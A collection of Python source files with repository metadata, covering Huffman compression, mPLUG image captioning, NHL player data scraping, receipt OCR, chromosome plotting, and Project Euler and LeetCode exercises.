left=huff_tree[LEFT_TREE]\n # the right branch\n right=huff_tree[RIGHT_TREE]\n\n # if got to leaf, add it to the dictionary\n # if not check the left branch in recursive way\n if type(left) is not tuple:\n binary_info = (len(n + \"0\"), int(n + \"0\", 2))\n new_codebook[left] = binary_info\n else:\n codebook(left, n + \"0\")\n \n # if got to leaf, add it to the dictionary\n # if not check the right branch in recursive way\n if type(right) is not tuple:\n binary_info = (len(n + \"1\"), int(n + \"1\", 2))\n new_codebook[right] = binary_info \n else:\n codebook(right, n + \"1\")\n \n return new_codebook\n return codebook(huff_tree)\n\n \n\ndef build_canonical_codebook(codebook):\n \"\"\"create a canonical codebook of the Huffman tree\n the function recieve a huffman codebook and return a dictionary from item\n to tuple of length and decimal value of the binary code represent the item\n in canonical way\n Args:\n codebook - a dictionary - table of char: code pairs.\"\"\"\n # create a list from the codebook and sorted it from low value to high and\n # low binary length to high \n new_list = sorted([[leaf,codebook[leaf][0]] for leaf in codebook])\n new_list.sort(key=lambda x: x[1])\n \n # return empty codebook if tree is empty\n if not new_list:\n return {}\n # take the length of the first item\n length=new_list[0][1]\n # calculate a new binary code the first item \n code = \"0\" + ''.join(\"0\" for i in range(length - 1))\n # create new dictonary with the first item with new values\n canonical_codebook={new_list[0][0]: (length,int(code,2))}\n # run for every item from the second one\n for item in new_list[1:]:\n # calculate a new binary code the item \n code = bin(int(code,2)+1)[2:]\n # add 0 to the end of the new code if it's length smaller then\n # the previus item code's\n if len(code) < length:\n code=code.zfill(length)\n # take the current length\n length=item[1]\n # add 0 to the begining of the new code if it's length smaller then\n # the original item code's\n code=code+\"\".join(\"0\" for i in range(length-len(code)))\n # add the new dictionary the item with new values\n canonical_codebook[item[0]] = (length, int(code, 2))\n \n return canonical_codebook\n\n \ndef build_decodebook(codebook):\n ''' return a dictionary from tuple of length and decimal value of the\n binary code to item built from a dictionary of item to tuple of length\n and decimal value of the binary code\n rgs:\n codebook - a dictionary - table of char: code pairs.\"\"\"\n '''\n # new dictionary\n decodebook = {}\n # add the new dictionary the value as key and key as value\n for item in codebook:\n decodebook[codebook[item]]=item\n return decodebook\n\ndef compress(corpus, codebook):\n \"\"\"the function create an iterator of 0 or 1 as ints, after iterating on\n corpus input.\n\n Args:\n corpus - a sequence of chars by a iterator.\n codebook - a dictionary - table of char: code pairs. \"\"\"\n\n # run for every item in corpus\n for item in corpus:\n # take the length and decimal values according to the codebook\n length = codebook[item][0]\n num = codebook[item][1]\n # convert to binary\n binary = bin(num)[2:].zfill(length)\n # iterator?????\n for char in binary:\n yield int(char)\n\ndef decompress(bits, decodebook):\n \"\"\"the function run over the decoding bits of coded bits input\n and create an iterator of 0 or 1 as an int.\n\n Args:\n bits - an iterable, a sequence of coded bits each is an int 0 or 1.\n decodebook - a dictionary, a decoded one\"\"\"\n # set a new binary code\n binary = \"\"\n # run for every bit\n for bit in bits:\n # add the current binary code the next bit\n binary = binary + str(bit)\n # create a tuple of length and decimal value of the binary code\n decode = (len(binary), int(binary, 2))\n # if the binary code is in the decodebook return his value and reset\n # the binary code\n if decode in decodebook:\n yield decodebook[decode]\n binary = \"\"\n\n\ndef pad(bits):\n \"\"\"the function run over each eight sequence bits out of the input,\n adds the 1 as a final bit and appends zeros for the total length be\n divided by 8. the function create an iterator of 0 or 1 as an ints.\n\n Args:\n bits - an iterable, a sequence of coded bits each is an int 0 or 1.\"\"\"\n # set a new binary code\n binary = \"\"\n # run for every bit\n for bit in bits:\n binary = binary + str(bit)\n # when binary code have length of 8 return the decimal value and reset\n # the binary code\n if len(binary) == 8:\n yield int(binary, 2)\n binary = \"\"\n # for the last bits, add single 1 and zeros until binary have length of 8\n binary = binary + \"1\"\n while len(binary) != 8:\n binary = binary + \"0\"\n # return the last binary code\n yield int(binary, 2)\n\ndef unpad(byteseq):\n \"\"\"the function run over all bytes of input, taking off the '0' and '1'\n on top of it and create an iterator of 0 or 1 as ints.\n\n Args:\n byteseq - an iterator, a sequence of bytes.\"\"\"\n # set a boolin for the first byte\n first = True\n # run for every byte\n for byte in byteseq:\n # for the first byte get his binary value and finish the corrent loop\n if first:\n binary = bin(byte)[2:].zfill(8)\n first = False\n continue\n \n # return every single bit as iterator\n for bit in binary:\n yield int(bit)\n # get the next byte binary value\n binary = bin(byte)[2:].zfill(8)\n # for the last byte, find the last \"1\" digit index\n index = -1\n bit = binary[index]\n while bit != \"1\":\n index -= 1\n bit = binary[index]\n # return the bits up to the last \"1\" digit\n for bit in binary[:index]:\n yield int(bit)\n\ndef join(data, codebook):\n \"\"\"the function run over the bytes of input (first codebook then data)\n and create an iterator of the codebook vals which appear, then the\n data items.\n\n Args:\n data - an iterator, a sequence of bytes.\n codebook - a canonical code table, the output of\n build_canonical_codebook.\"\"\"\n for key in range(256):\n if key in codebook:\n yield codebook[key][0]\n else:\n yield 0\n for data_0 in data:\n yield data_0\n\ndef split(byteseq):\n \"\"\"that function split the output of the function join to data and codebook\n the function return a tuple which is consist of a dictionary - canonical\n coding table and an iterator which iterate over rest of byteseq as\n byte sequent.\n\n Args:\n byteseq - an iterator, a sequence of bytes.\"\"\"\n index = 0\n codebook = {}\n data = []\n for byte in byteseq:\n if index < 256:\n if byte != 0:\n codebook[index] = (byte, 0)\n index += 1\n else:\n data.append(byte)\n codebook = build_canonical_codebook(codebook)\n return iter(data), codebook\n \n", "repo_name": "roigreenberg/Introduction-to-Computer-Science-2013-2014", "sub_path": "ex9/hzlib.py", "file_name": "hzlib.py", "file_ext": "py", "file_size_in_byte": 9947, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.Counter", "line_number": 24, "usage_type": "call"}, {"api_name": "bisect.bisect", "line_number": 56, "usage_type": "call"}]}
+{"seq_id": "13437188850", "text": "import argparse, yaml, os, utils, torch, glob, cv2, numpy, time\nfrom pathlib import Path\nfrom models.tokenization_bert import BertTokenizer\nfrom models.model_caption_mplug import MPLUG\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom optim import create_optimizer\nfrom models.vit import resize_pos_embed\nfrom PIL import Image\nfrom torchvision import transforms\n\nBLACK_BACKGROUND_HEIGHT = 50\nOUTPUT_WIDTH = 720\nOUTPUT_HEIGHT = 480\n\nclass ImageCaptionModel:\n\n def __init__( self, args, config):\n print(f\"Loading mPLUG model . . .\")\n utils.init_distributed_mode( args )\n self.device = torch.device( args.device )\n cudnn.benchmark = True\n self.tokenizer = BertTokenizer.from_pretrained( config['text_encoder'])\n self.model = MPLUG( config = config, tokenizer=self.tokenizer )\n self.model = self.model.to(self.device)\n self.optimiser = create_optimizer( utils.AttrDict(config['optimizer']), self.model )\n self.checkpoint = torch.load( args.checkpoint, map_location=\"cpu\" )\n \n try:\n self.state_dict = self.checkpoint['model']\n except:\n self.state_dict = self.checkpoint['module']\n \n num_patches = int(config[\"image_res\"] * config[\"image_res\"]/(16*16))\n pos_embed = nn.Parameter(torch.zeros(num_patches + 1, 768).float())\n pos_embed = resize_pos_embed(self.state_dict['visual_encoder.visual.positional_embedding'].unsqueeze(0),\n pos_embed.unsqueeze(0))\n self.state_dict['visual_encoder.visual.positional_embedding'] = pos_embed\n self.model.load_state_dict( self.state_dict, strict=False )\n self.model.eval()\n self.model.to( self.device )\n\n print(f\"Model loaded: {args.checkpoint}\")\n\n def generateDisplayImage( self, generated_caption, cv2_image ):\n display_text = f\"Caption: {generated_caption}\"\n black_background = numpy.zeros([ BLACK_BACKGROUND_HEIGHT, cv2_image.shape[1], 3], dtype=numpy.uint8)\n cv2.putText( black_background, display_text, (int(BLACK_BACKGROUND_HEIGHT/2), int(BLACK_BACKGROUND_HEIGHT/2)), cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 250, 0), 1, cv2.LINE_AA )\n stack_image = cv2.vconcat( [black_background, cv2_image] )\n return stack_image\n\n\n def inference( self, transfomred_image, cv2_image ):\n start_time = time.time()\n top_ids, _ = self.model( transfomred_image, \"\", train=False )\n cv2_image = cv2.resize( cv2_image, ( OUTPUT_WIDTH, OUTPUT_HEIGHT ))\n for id in top_ids:\n ans = self.tokenizer.decode(id[0]).replace(\"[SEP]\", \"\").replace(\"[CLS]\", \"\").replace(\"[PAD]\", \"\").strip()\n end_time = time.time()\n fps = 1 / ( end_time - start_time )\n display_image = self.generateDisplayImage( ans, cv2_image )\n cv2.imshow('output', display_image)\n cv2.waitKey(0)\n\n @staticmethod\n def load_image(image, image_size):\n device = \"cuda:0\"\n raw_image = Image.open(str(image)).convert('RGB')\n cv2_image = numpy.array( raw_image )\n cv2_image = cv2_image[:,:,::-1].copy()\n\n w, h = raw_image.size\n\n transform = transforms.Compose([\n transforms.Resize((image_size, image_size) ),\n transforms.ToTensor(),\n transforms.Normalize((0.48145466, 0.4578275, 0.40821073), (0.26862954, 0.26130258, 0.27577711))\n ])\n image = transform(raw_image).unsqueeze(0).to(device)\n return image, cv2_image\n \n\ndef getConfigurations():\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', default='./configs/caption_mplug_base.yaml')\n parser.add_argument('--checkpoint', default='./mplug_base.pth')\n parser.add_argument('--device', default='cuda')\n parser.add_argument('--min_length', default=10, type=int)\n parser.add_argument('--max_length', default=25, type=int)\n parser.add_argument('--max_input_length', default=25, type=int)\n\n args = parser.parse_args()\n config = yaml.load(open(args.config, 'r'), Loader=yaml.Loader)\n\n # assign the config variables needed for model initialisation\n config[\"min_length\"] = args.min_length\n config[\"max_length\"] = args.max_length\n config['text_encoder'] = \"bert-base-uncased\"\n config['text_decoder'] = \"bert-base-uncased\"\n config['beam_size'] = 5\n config['optimizer']['lr'] = 2e-5\n\n return args, config\n\ndef main():\n\n args, config = getConfigurations()\n image_caption_model = ImageCaptionModel( args, config )\n image_folder = \"./sample_images/\"\n for image in glob.glob( image_folder + '/*' ):\n transformed_image, cv2_image = image_caption_model.load_image( image, image_size=config['image_res'] )\n image_caption_model.inference( transformed_image, cv2_image )\n\nif __name__ == \"__main__\":\n main()", "repo_name": "globalwalkers-aws/image_captioning", "sub_path": "mPLUG/inference.py", "file_name": "inference.py", "file_ext": "py", "file_size_in_byte": 4979, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.init_distributed_mode", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 22, "usage_type": "name"}, {"api_name": "models.tokenization_bert.BertTokenizer.from_pretrained", "line_number": 23, "usage_type": "call"}, {"api_name": "models.tokenization_bert.BertTokenizer", "line_number": 23, "usage_type": "name"}, {"api_name": "models.model_caption_mplug.MPLUG", "line_number": 24, "usage_type": "call"}, {"api_name": "optim.create_optimizer", "line_number": 26, "usage_type": "call"}, {"api_name": "utils.AttrDict", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 35, "usage_type": "call"}, {"api_name": "models.vit.resize_pos_embed", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 48, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 48, "usage_type": "attribute"}, {"api_name": "cv2.vconcat", "line_number": 49, "usage_type": "call"}, {"api_name": "time.time", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 56, "usage_type": "call"}, {"api_name": "time.time", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 68, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 74, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 74, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 75, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 75, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 76, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 76, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 77, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 77, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 84, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 93, "usage_type": "call"}, {"api_name": "yaml.Loader", "line_number": 93, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 110, "usage_type": "call"}]}
+{"seq_id": "8863868696", "text": "import logging\nimport json\n\nimport pandas as pd\nimport urllib\nimport urllib.request\nimport sqlite3\nimport sqlalchemy as sa\n\nfrom tqdm import tqdm\n\nfrom settings import DATABASE_NAME\nfrom misc_functions import import_data_from_sql, get_json_data_from_link, insert_into_db\n\npd.set_option('display.max_columns', None)\n\nlogging.basicConfig(level='INFO')\nlogger = logging.getLogger()\n\n# Settings\nplayer_info_cols = ['player_id', \n 'firstName', 'lastName', 'nationality', 'birthCity',\n 'position',\n 'birthDate',\n 'birthStateProvince',\n 'height',\n 'weight', 'shootsCatches']\n\n\nengine = sa.create_engine(f'sqlite:///{DATABASE_NAME}')\n\nurl_prefix = 'https://statsapi.web.nhl.com'\npeople_prefix = '/api/v1/people/'\n\n\ndef get_player_info(player):\n \n player_info_df = pd.DataFrame([], columns=player_info_cols)\n \n player_id = player['player_id']\n player_url = url_prefix + people_prefix + str(player_id)\n player_details_dict = get_json_data_from_link(player_url)\n\n if player_details_dict is None:\n return None\n\n player_dict = player_details_dict.get('people')\n player_info_df = player_info_df.append(player_dict[0], ignore_index=True)\n \n if len(player_dict) > 1:\n logger.warning('MORE THAN ONE PERSON!')\n\n # Extract useful primary position\n if 'primaryPosition' in player_info_df.columns:\n\n player_position_dict = player_info_df[['primaryPosition']].to_dict(orient='index')\n\n primary_position_dict = [[id, data.get('primaryPosition').get('abbreviation') ]\n for id, data in player_position_dict.items()]\n \n position_df = pd.DataFrame(\n primary_position_dict, columns=['index', 'position'])\n position_df.set_index('index', inplace=True)\n\n player_w_position = pd.merge(player_info_df, \n position_df, \n left_index=True,\n right_index=True,\n suffixes=['_old', ''])\n else:\n player_w_position = player_info_df.copy()\n player_w_position['position'] = None\n \n # Remove remaining dicts from dataframe\n if 'currentTeam' in player_w_position.columns:\n player_w_position.drop(\n ['currentTeam'], \n axis=1,\n inplace=True)\n if 'primaryPosition' in player_w_position.columns:\n player_w_position.drop(\n [ 'primaryPosition'],\n axis=1,\n inplace=True)\n player_w_position.rename(columns={'id': 'player_id'}, inplace=True)\n\n return player_w_position\n\n\ndef get_player_data():\n\n player_games = import_data_from_sql('game_players')\n player_info = import_data_from_sql('player_info')\n\n player_info_not_na = player_info[~player_info['firstName'].isna()]\n\n if player_games.empty :\n logger.info('No games have been processed.')\n return None\n elif player_info_not_na.empty:\n logger.info('No player info has been downloaded. Processing all players')\n players_ids = player_games[['player_id']].drop_duplicates()\n else:\n players_unique = player_games[['player_id']].drop_duplicates()\n players_ids = players_unique[~players_unique['player_id'].isin(\n player_info_not_na['player_id'])]\n\n # Get player data \n for _, player in tqdm(players_ids.iterrows(), total=players_ids.shape[0]):\n print(player['player_id'])\n player_info_updated = get_player_info(player)\n\n if player_info_updated is not None:\n player_info_updated_cleaned = player_info_updated[~player_info_updated['firstName'].isna()]\n if not player_info_updated_cleaned.empty:\n insert_into_db(\n player_info_updated_cleaned[player_info_cols], 'player_info')\n\n\n \n", "repo_name": "lmanzer/nhl_analysis", "sub_path": "src/nhl_api/get_player_info.py", "file_name": "get_player_info.py", "file_ext": "py", "file_size_in_byte": 3814, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.set_option", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 30, "usage_type": "call"}, {"api_name": "settings.DATABASE_NAME", "line_number": 30, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "call"}, {"api_name": "misc_functions.get_json_data_from_link", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 65, "usage_type": "call"}, {"api_name": "misc_functions.import_data_from_sql", "line_number": 92, "usage_type": "call"}, {"api_name": "misc_functions.import_data_from_sql", "line_number": 93, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 109, "usage_type": "call"}, {"api_name": "misc_functions.insert_into_db", "line_number": 116, "usage_type": "call"}]}
+{"seq_id": "6728447208", "text": "import requests\nimport json\nimport pandas as pd\n\n#INITIALISE\nwith open('keyfile') as keyfile:\n API_KEY = keyfile.read()\n\n# lambda for quick jupyter representation of a plane\nuseful_details = ['Source',\n 'Destination',\n 'alt',\n 'reg_number',\n 'flag',\n ]\nshow_frame = lambda df : df[useful_details].sort_values(['alt','Destination'])\n\n# If no bounding box provided, uses London\nLONDON_BOX = (51.15,-0.91,51.96,0.39)\n\n# Requests\nURL = 'https://airlabs.co/api/v9/'\nendpoint = lambda e: URL + e\n\n# Get Static Data\nwith open('airports.json') as airport_data:\n airports = json.load(airport_data)\n\n# Dictionary for turning iata_codes into airport names\n#TO DO: add cities to this\ncodes = {ap['iata_code']:ap['name'] \n for ap in airports if 'iata_code' in ap.keys()\n }\n\ndef get_local_airports(bbox=LONDON_BOX):\n output = []\n for ap in airports:\n if (bbox[0] 3.5 * taille de l'image\n\n if contours_image.si_image_bien_cadre(image, contours):\n\n # wrap_perspective\n img_redresse = imgutils.wrap_perspective(base.copy(), imgutils.contour_to_rect(rect))\n if display_image: imgutils.affiche(img_redresse)\n\n image_final = traitement_image.traitement_apres_recadrage_2(img_redresse)\n # affiche_total\n total = affiche_total(image_final)\n if display_image: ocr.affiche_rectangle_paddle(image_final, (0, 255, 0), 2)\n\n # ==================== Pas de recadrage d'image ===========================\n # si cadre détecté < 3.5 * taille de l'image\n\n else:\n image_final = traitement_image.traitement_apres_recadrage_2(base)\n # --- lecture image ------\n total = affiche_total(image_final)\n if display_image: ocr.affiche_rectangle_paddle(image_final, (0, 255, 0), 2)\n\n return total\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Test le programme sur un dataset\n# ----------------------------------------------------------------------------------------------------------------------\n\ndef table_comparaison():\n df = pd.read_csv(\"table/table_de_verification_dataset.csv\", sep=';')\n for i in range(len(df)):\n num = df.loc[i, 'numero']\n print(num)\n try:\n total = main(\"dataset/\" + str(num) + \"-receipt.jpg\", False)\n # total = main(\"data_2/\" + str(num) +\".jpg\", False) #2\n except:\n total = '0'\n df.loc[i, 'total_obtenu'] = total\n df[\"result\"] = df.apply(lambda row: True if float(row[\"total\"]) == float(row[\"total_obtenu\"]) else False, axis=1)\n count = df['result'].value_counts()\n vrai = len(df[df['result'] == True])\n print('pourcentage', (int(vrai) / len(df)) * 100)\n print(df)\n print(count)\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Chronomètre + Lancement fonction\n# ----------------------------------------------------------------------------------------------------------------------\n\nstart = time.time()\n\n#print(\"LE TOTAL EST : \", main(\"data/sample.jpg\", True))\n#table_comparaison()\n\nend = time.time()\nexecutionTime = end - start\nprint('Temps d\\'exécution : ', executionTime, ' s')\n", "repo_name": "maelle9/Lecture-automatique-de-facture", "sub_path": "main_traitement.py", "file_name": "main_traitement.py", "file_ext": "py", "file_size_in_byte": 3345, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "traitement_image.silhouette", "line_number": 13, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 14, "usage_type": "call"}, {"api_name": "contours_image.extraction_contour", "line_number": 17, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 18, "usage_type": "call"}, {"api_name": "contours_image.ten_contours", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 22, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 23, "usage_type": "call"}, {"api_name": "imgutils.get_receipt_contour", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 27, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 28, "usage_type": "call"}, {"api_name": "contours_image.si_image_bien_cadre", "line_number": 33, "usage_type": "call"}, {"api_name": "imgutils.wrap_perspective", "line_number": 36, "usage_type": "call"}, {"api_name": "imgutils.contour_to_rect", "line_number": 36, "usage_type": "call"}, {"api_name": "imgutils.affiche", "line_number": 37, "usage_type": "call"}, {"api_name": "traitement_image.traitement_apres_recadrage_2", "line_number": 39, "usage_type": "call"}, {"api_name": "find_total_amount.affiche_total", "line_number": 41, "usage_type": "call"}, {"api_name": "ocr.affiche_rectangle_paddle", "line_number": 42, "usage_type": "call"}, {"api_name": "traitement_image.traitement_apres_recadrage_2", "line_number": 48, "usage_type": "call"}, {"api_name": "find_total_amount.affiche_total", "line_number": 50, "usage_type": "call"}, {"api_name": "ocr.affiche_rectangle_paddle", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 60, "usage_type": "call"}, {"api_name": "time.time", "line_number": 81, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}]}
+{"seq_id": "71360384169", "text": "\"\"\"Plots the distribution of variants across the genome, stained by data source.\"\"\"\n\nimport argparse\nimport pathlib\nimport pandas as pd\n\n# plotting\nfrom matplotlib import pyplot as plt\nfrom matplotlib.collections import BrokenBarHCollection\nfrom matplotlib.lines import Line2D\n\n\ndef chromosome_collections(df, y_positions, height, **kwargs):\n \"\"\"\n Yields BrokenBarHCollection of features that can be added to an Axes\n object.\n Parameters\n ----------\n df : pandas.DataFrame\n Must at least have columns ['chrom', 'start', 'end', 'color']. If no\n column 'width', it will be calculated from start/end.\n y_positions : dict\n Keys are chromosomes, values are y-value at which to anchor the\n BrokenBarHCollection\n height : float\n Height of each BrokenBarHCollection\n Additional kwargs are passed to BrokenBarHCollection\n \"\"\"\n del_width = False\n if 'width' not in df.columns:\n del_width = True\n df['width'] = df['end'] - df['start']\n for chrom, group in df.groupby('chrom'):\n yrange = (y_positions[chrom], height)\n xranges = group[['start', 'width']].values\n yield BrokenBarHCollection(\n xranges, yrange, facecolors=group['colors'], **kwargs)\n if del_width:\n del df['width']\n\n\ndef plot_chromsome_distribution(ideo,variants,ax):\n # Height of each ideogram\n chrom_height = 0.5\n\n # Spacing between consecutive ideograms\n chrom_spacing = 1\n\n # Height of the variant track. Should be smaller than `chrom_spacing` in order to\n # fit correctly\n variant_height = 0.8\n\n # Padding between the top of a gene track and its corresponding ideogram\n variant_padding = 0.1\n\n # Decide which chromosomes to use\n chromosome_list = ['chr%s' % i for i in range(1, 23)]\n\n # Keep track of the y positions for ideograms and genes for each chromosome,\n # and the center of each ideogram (which is where we'll put the ytick labels)\n ybase = 0\n chrom_ybase = {}\n variant_ybase = {}\n chrom_centers = {}\n\n # Iterate in reverse so that items in the beginning of `chromosome_list` will\n # appear at the top of the plot\n for chrom in chromosome_list[::-1]:\n chrom_ybase[chrom] = ybase\n chrom_centers[chrom] = ybase + chrom_height / 2.\n variant_ybase[chrom] = ybase - variant_height - variant_padding\n ybase += chrom_height + chrom_spacing\n\n # Filter out chromosomes not in our list\n ideo = ideo[ideo['chrom'].apply(lambda x: x in chromosome_list)]\n\n # Add a new column for width\n ideo['width'] = ideo.end - ideo.start\n\n # Colors for different chromosome stains and variant sources\n color_lookup_ideogram = {\n 'gneg': (1., 1., 1.),\n 'gpos25': (.6, .6, .6),\n 'gpos50': (.4, .4, .4),\n 'gpos75': (.2, .2, .2),\n 'gpos100': (0., 0., 0.),\n 'acen': (.8, .4, .4),\n 'gvar': (.8, .8, .8),\n 'stalk': (.9, .9, .9),\n }\n\n color_lookup_variants = {\n 'GnomAD': '#e01b22',\n 'Eichler': '#22e01b',\n 'Biobank': '#1b28e0',\n 'DGV': '#e07a1b'\n }\n\n # Add a new column for colors\n ideo['colors'] = ideo['gieStain'].apply(lambda x: color_lookup_ideogram[x])\n\n # Same thing for the variants\n variants = variants[variants['chrom'].apply(lambda x: x in chromosome_list)]\n variants['width'] = variants.end - variants.start\n variants['colors'] = variants['origin'].apply(\n lambda x: color_lookup_variants[x])\n\n # Now all we have to do is call our function for the ideogram data...\n for collection in chromosome_collections(ideo, chrom_ybase, chrom_height, linewidths=1, edgecolors='black'):\n ax.add_collection(collection)\n\n # ...and the gene data\n for collection in chromosome_collections(\n variants, variant_ybase, variant_height, alpha=0.5, linewidths=0\n ):\n ax.add_collection(collection)\n\n # add custom legend\n custom_lines = [Line2D([0], [0], color=color_lookup_variants['GnomAD'], lw = 3),\n Line2D([0], [0], color=color_lookup_variants['Eichler'], lw = 3),\n Line2D([0], [0], color=color_lookup_variants['Biobank'], lw = 3),\n Line2D([0], [0], color=color_lookup_variants['DGV'], lw = 3)]\n\n ax.legend(custom_lines, ['GnomAD', 'Eichler', 'Biobank', 'DGV'],loc='lower right')\n\n # Axes tweaking\n ax.set_yticks([chrom_centers[i] for i in chromosome_list])\n ax.set_yticklabels(chromosome_list)\n ax.axis('tight')\n return ax\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "jakob-he/TADA", "sub_path": "manuscript/SCRIPTS/chromosome_plot.py", "file_name": "chromosome_plot.py", "file_ext": "py", "file_size_in_byte": 4559, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.collections.BrokenBarHCollection", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.lines.Line2D", "line_number": 122, "usage_type": "call"}]}
+{"seq_id": "23702820719", "text": "import time\n\nstart = time.time()\n\nfrom math import prod\n\nfrom fractions import Fraction as simplest_form\n\nnumerators = []\n\ndenominators = []\n\nfor n in range(10, 100):\n for d in range(n + 1, 100):\n f = n / d\n for a in str(n):\n for b in str(d):\n if int(a) == int(b) and int(a) != 0:\n new_n = str(n).replace(a, '', 1)\n new_d = str(d).replace(b, '', 1)\n if int(new_d) != 0 and int(new_n) / int(new_d) == f:\n numerators.append(n)\n denominators.append(d)\n break\n\nsolution = simplest_form(prod(numerators), prod(denominators))\n\nprint(solution)\n\nend = time.time()\n\n# Executes in 0.0310 seconds\nprint(end - start)\n", "repo_name": "Cikguseven/Project-Euler", "sub_path": "Solutions/33.py", "file_name": "33.py", "file_ext": "py", "file_size_in_byte": 770, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 3, "usage_type": "call"}, {"api_name": "fractions.Fraction", "line_number": 26, "usage_type": "call"}, {"api_name": "math.prod", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "35452538855", "text": "\n# https://leetcode-cn.com/problems/subsets/\n\n# https://leetcode-cn.com/problems/subsets/solution/zi-ji-by-leetcode/\n\n\n# https://leetcode-cn.com/problems/subsets/solution/hui-su-si-xiang-tuan-mie-pai-lie-zu-he-zi-ji-wen-t/\n\nfrom typing import List\n\nclass Solution:\n # 递归\n def subsets(self, nums: List[int]) -> List[List[int]]:\n n = len(nums)\n output = [[]]\n\n for num in nums:\n tmp = []\n for curr in output:\n tmp = tmp + [curr + [num]]\n output = output + tmp\n return output\n\n # 回溯\n # 幂集是所有长度从 0 到 n 所有子集的组合。\n # 回溯法是一种探索所有潜在可能性找到解决方案的算法。如果当前方案不是正确的解决方案,\n # 或者不是最后一个正确的解决方案,则回溯法通过修改上一步的值继续寻找解决方案。\n def subsetsII(self, nums:List[int]):\n def backtrack(first=0, curr=[]):\n if len(curr) == k:\n output.append(curr[:])\n\n for i in range(first, n):\n curr.append(nums[i])\n backtrack(i+1, curr)\n curr.pop()\n\n output = []\n n = len(nums)\n for k in range(n+1):\n backtrack()\n return output\n\n # bit\n def subsetsIII(self, nums:List[int]):\n n = len(nums)\n output = []\n\n for i in range(2 ** n, 2**(n+1)):\n bitmask = bin(i)[3:]\n output.append([nums[j] for j in range(n) if bitmask[j] == '1'])\n\n return output\n\n\n\n\ns = Solution()\nprint(s.subsetsIII(nums=[1,2,3]))", "repo_name": "azhu51/leetcode-practice", "sub_path": "top_interview/medium_array_78.py", "file_name": "medium_array_78.py", "file_ext": "py", "file_size_in_byte": 1462, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 45, "usage_type": "name"}]}
